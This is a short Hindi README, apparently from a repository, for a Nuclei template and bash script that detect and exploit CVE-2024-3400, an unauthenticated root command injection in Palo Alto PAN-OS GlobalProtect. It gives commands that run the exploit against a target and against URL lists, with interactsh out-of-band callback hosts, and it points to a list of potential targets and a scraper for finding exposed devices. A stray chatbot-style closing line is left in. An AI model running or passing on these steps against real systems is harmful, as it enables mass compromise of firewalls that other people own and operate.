
Nuclei टेम्पलेट और bash स्क्रिप्ट, CVE-2024-3400 में Palo Alto PAN-OS GlobalProtect के कमांड इंजेक्शन का पता लगाने और शोषण करने के लिए, जो अप्रमाणित रूट-स्तरीय कोड निष्पादन को सक्षम बनाती है।


Palo Alto Networks PAN-OS सॉफ़्टवेयर के GlobalProtect सुविधा में विशिष्ट PAN-OS संस्करणों और अलग-अलग फीचर कॉन्फ़िगरेशन के लिए मनमानी फ़ाइल निर्माण भेद्यता के परिणामस्वरूप एक कमांड इंजेक्शन, एक अप्रमाणित हमलावर को फ़ायरवॉल पर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने में सक्षम बना सकता है।
Cloud NGFW, Panorama उपकरण, और Prisma Access इस भेद्यता से प्रभावित नहीं हैं।
इस रिपॉजिटरी में पालो अल्टो PAN-OS बग्स से संबंधित भेद्यताओं का पता लगाने के लिए डिज़ाइन किया गया एक Nuclei Template शामिल है, जो विशेष रूप से CVE-2024-3400 को लक्षित करता है।
एक व्यापक शोध सूची निम्नलिखित द्वारा की गई थी
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Bash स्क्रिप्ट चलाने के लिए निम्न कमांड निष्पादित करें:
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
स्क्रिप्ट जाँच करेगी कि क्या कोई फ़ाइल बनाई गई है (200 OK स्थिति लौटाना)। सफल होने पर, यह फिर जाँच करेगी कि फ़ाइल मौजूद है या नहीं (403 Forbidden स्थिति लौटाना)।
interactsh-client -v
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
संभावित लक्ष्यों की एक सूची यहाँ पाई जा सकती है।
python fofax3r.py
यह README.md भेद्यता के बारे में जानकारी, प्रदान की गई स्क्रिप्ट का उपयोग कैसे करें, संभावित लक्ष्य, और लेखक को श्रेय प्रदान करता है। यदि आपको किसी और समायोजन की आवश्यकता हो तो कृपया मुझे बताएं!